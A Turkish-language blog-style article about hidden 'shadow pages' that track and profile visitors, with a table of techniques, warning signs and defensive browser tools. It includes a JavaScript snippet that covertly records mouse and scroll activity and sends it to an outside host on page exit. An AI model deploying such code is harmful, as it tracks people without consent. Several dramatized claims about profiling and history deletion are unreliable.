Onlar görünmezler. Arama motorlarında çıkmazlar. Doğrudan yazsan bile 404 alırsın. Ama biri linki paylaştığında, tıklarsan... çoktan izlenmeye başlamışsındır.
İşte bu yazıda, arka planda gizlenen ama seni ön planda izleyen sayfaların, yani gölgeli sayfaların yapısını ve nasıl çalıştığını anlatıyoruz.
Gölgeli Sayfa Nedir?
Gölgeli sayfa; internette görünmeyen, indexlenmeyen ama aktif çalışan bir web yapısıdır. Genellikle şu özellikleri taşır:
- Arama motoru robotlarını engeller (robots.txt: Disallow: /)
- Tarayıcı geçmişine kaydedilmez (JavaScript ile otomatik silinir)
- Başka bir sayfaya yönlendirme yapar ama arka planda sizi işler
- IP değil, davranış bazlı profil çıkarır
Girdiğinizi bilmezsiniz. Ama çıktığınızda birileri sizi tanımaya başlamıştır.
Görünmeyen ama Aktif Sayfalar Nasıl Çalışır?
Bir gölgeli sayfa genelde bir iframe, link kısaltıcı, ya da zararsız gibi görünen bir URLnin arkasında gizlenir. İçine girer girmez şunlar başlar:
| Gizli İşlem | Amaç | Kullanılan Yöntem |
|---|---|---|
| Canvas Fingerprinting | Benzersiz tarayıcı izi | Görsel öğe işleme farkını analiz eder |
| Mouse hareket takibi | Kullanıcı tipi tespiti | Algoritmik kişilik çıkarımı |
| Yönlendirme logu | Bağlantıya nereden geldiniz? | document.referrer kullanımı |
| Ziyaret süresi & etkileşim | Duygusal durum analizleri | Scroll, tıklama, bekleme ölçümü |
Ve sonra? Sayfa kapansa bile veri çoktan gitmiştir. Nereye mi?
Deep profilleme sunucularına bu yapılar kullanıcıyı reklam için değil, daha çok davranışsal siluet oluşturmak için analiz eder. Yani sadece kim olduğunu değil, nasıl biri olduğunu anlamaya çalışırlar.
Bu Sayfaları Kimler Kullanıyor?
Bunlar sıradan siteler değil. Genellikle şu tip yapılar kullanır:
- Paranoya odaklı araştırma toplulukları
- Yapay zekâ destekli dijital psikoloji ağları
- Siber güvenlik açıkları arayan grey hat gruplar
- Ve bazen sadece: bakalım kaç saniyede seni çözebilirim? diyen bağımsız geliştiriciler
Böyle Bir Sayfaya Girdiğini Nasıl Anlarsın?
İşte bazı sinyaller:
- Sayfa hemen yönlendirme yapar ama bir şey olmuş hissi kalır
- Tarayıcı geri düğmesi düzgün çalışmaz
- Hiçbir şey görünmese bile CPU kullanımı artar
- Sonradan girdiğiniz başka sayfalarda sizi tanıyan içerikler çıkar
Ve en korkutucusu... bu sayfalar çoğu zaman sizi tekrar çağırır. Belki başka bir isimle. Belki başka bir linkle. Ama tanır. Çünkü profiliniz artık vardır.
Bir Örnek Kod?
Gölgeli sayfaların tipik örneklerinden biri:
script
// Kullanıcı davranışı toplanıyor
const profile = {
startTime: new Date(),
mouseMoves: [],
scrollDepth: 0
};
document.onmousemove = (e) => {
profile.mouseMoves.push({ x: e.clientX, y: e.clientY, t: Date.now() });
};
window.onscroll = () => {
profile.scrollDepth = window.scrollY;
};
window.onbeforeunload = () => {
fetch("https://shadowprofile.xyz/api/store", {
method: "POST",
body: JSON.stringify(profile)
});
};
/script
Bu sayfa siz hiç görmeden çalışır. Evet,
bile görünmezdir.
Korunmanın Yolu Var mı?
Gölgeli sayfalar, geleneksel antivirüs sistemleriyle algılanmaz. Ama:
- Scriptleri engelleyen tarayıcı eklentileri (NoScript, uMatrix)
- DoH (DNS over HTTPS) kullanımı
- Gerçek zamanlı ağ trafiği izleme
- Ve en önemlisi: linke tıklamadan önce onu çözümle
Unutma: Her tıklama bir iz bırakır. Ama bazı sayfalar izini almadan gitmene izin vermez.
Ben yokum gibi görünürüm. Ama sen buradayken ben seni çoktan tanıdım.
ShadowHost v0.9